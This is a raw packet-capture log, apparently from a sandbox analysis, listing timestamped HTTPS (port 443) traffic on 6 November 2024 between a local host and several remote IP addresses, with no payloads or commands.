                                                                                                                                                                                                            Nov 6, 2024 06:29:43.569459915 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.569494009 CET57696443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.569516897 CET57696443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.569833994 CET57710443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.569873095 CET44357710162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.569952965 CET57710443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.570312977 CET57710443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.570327044 CET44357710162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.583883047 CET4435770713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.584320068 CET57707443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.584333897 CET4435770713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.584767103 CET57707443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.584770918 CET4435770713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.586182117 CET4435770313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.586494923 CET57703443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.586517096 CET4435770313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.586685896 CET4435770613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.586848021 CET57703443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.586853981 CET4435770313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587095976 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587131977 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587124109 CET57706443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587160110 CET4435770613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587167025 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587172031 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587182045 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587213993 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587274075 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587624073 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587649107 CET57706443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587656021 CET4435770613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587666988 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.587675095 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.591784000 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.591816902 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.591836929 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.591845989 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.591881990 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.595278025 CET4435770513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.595582008 CET57705443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.595592976 CET4435770513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.595940113 CET57705443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.595943928 CET4435770513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.596240997 CET4435770413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.596502066 CET57704443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.596518040 CET4435770413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.596844912 CET57704443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.596851110 CET4435770413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.609380960 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.609431028 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.609616041 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.609865904 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.609870911 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.609883070 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.609915972 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.610222101 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.610245943 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.610301018 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.610708952 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.610723972 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.617403030 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.617454052 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.617552042 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.617608070 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631356001 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631407022 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631443977 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631455898 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631464005 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631525993 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631561995 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631568909 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631577969 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631618977 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631625891 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.631709099 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.632086039 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.636046886 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.636096954 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.636105061 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.638987064 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.639163971 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.639177084 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.640249968 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.640306950 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.640630960 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.640716076 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.640780926 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.640788078 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644011021 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644052029 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644095898 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644129038 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644140005 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644150972 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644171953 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644303083 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644349098 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644357920 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644403934 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644433975 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644462109 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644468069 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.644503117 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.658194065 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.658447027 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.658452988 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659307957 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659363985 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659468889 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659476995 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659503937 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659528017 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659539938 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659550905 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659579992 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659667015 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659729004 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659827948 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.659832954 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.677094936 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.693087101 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704010010 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704118013 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704169989 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704170942 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704179049 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704212904 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704554081 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704824924 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704869032 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704874039 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704916000 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704943895 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704988003 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.704993963 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.705120087 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.708774090 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.711791992 CET4435770713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.712033987 CET4435770713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.712174892 CET57707443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.712229967 CET57707443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.712239027 CET4435770713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.712248087 CET57707443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.712253094 CET4435770713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.714488029 CET57712443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.714500904 CET4435771213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.714730024 CET57712443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.714883089 CET57712443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.714891911 CET4435771213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.716314077 CET4435770613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.716538906 CET4435770613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.716590881 CET57706443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.716624975 CET57706443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.716639996 CET4435770613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.716650963 CET57706443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.716655970 CET4435770613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.718621016 CET4435770313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.718843937 CET57713443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.718859911 CET4435770313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.718868971 CET4435771313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.718920946 CET57703443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.718940020 CET57713443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.719059944 CET57713443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.719069958 CET4435771313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.719094992 CET57703443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.719106913 CET4435770313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.719120979 CET57703443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.719125032 CET4435770313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.720242977 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.720441103 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.720447063 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721303940 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721359968 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721647024 CET57714443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721654892 CET4435771413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721703053 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721730947 CET57714443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721751928 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721843958 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721848965 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.721997023 CET57714443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.722004890 CET4435771413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.724332094 CET4435770513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.724627972 CET4435770513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.724711895 CET57705443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.724751949 CET57705443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.724756956 CET4435770513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.724766016 CET57705443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.724769115 CET4435770513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.726100922 CET4435770413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.726377010 CET4435770413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.726453066 CET57704443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.726602077 CET57704443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.726613045 CET4435770413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.726623058 CET57704443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.726627111 CET4435770413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.727282047 CET57715443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.727293968 CET4435771513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.727420092 CET57715443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.727550030 CET57715443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.727562904 CET4435771513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.728599072 CET57716443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.728621960 CET4435771613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.728682041 CET57716443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.728817940 CET57716443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.728827953 CET4435771613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.736974001 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.736989975 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737021923 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737027884 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737080097 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737533092 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737596035 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737598896 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737622023 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737643957 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737657070 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737893105 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.737896919 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.740252018 CET57717443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.740277052 CET44357717162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.740360975 CET57717443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.740603924 CET57717443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.740617037 CET44357717162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750092030 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750169039 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750207901 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750215054 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750266075 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750363111 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750369072 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750695944 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750787973 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750824928 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750839949 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750848055 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.750871897 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767205000 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767277002 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767338991 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767345905 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767714977 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767788887 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767793894 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767803907 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767841101 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.767851114 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.768395901 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.768431902 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.768484116 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.768490076 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.768537998 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.772195101 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798340082 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798392057 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798425913 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798469067 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798480034 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798518896 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798533916 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798593044 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798626900 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798657894 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798665047 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798671961 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798695087 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.798945904 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.799104929 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.799109936 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.802875042 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.802917004 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.802947998 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.802973986 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.802994967 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.803000927 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.803028107 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.803061962 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.803112030 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.803808928 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.803814888 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.804110050 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.804114103 CET44357702104.17.25.14192.168.2.4
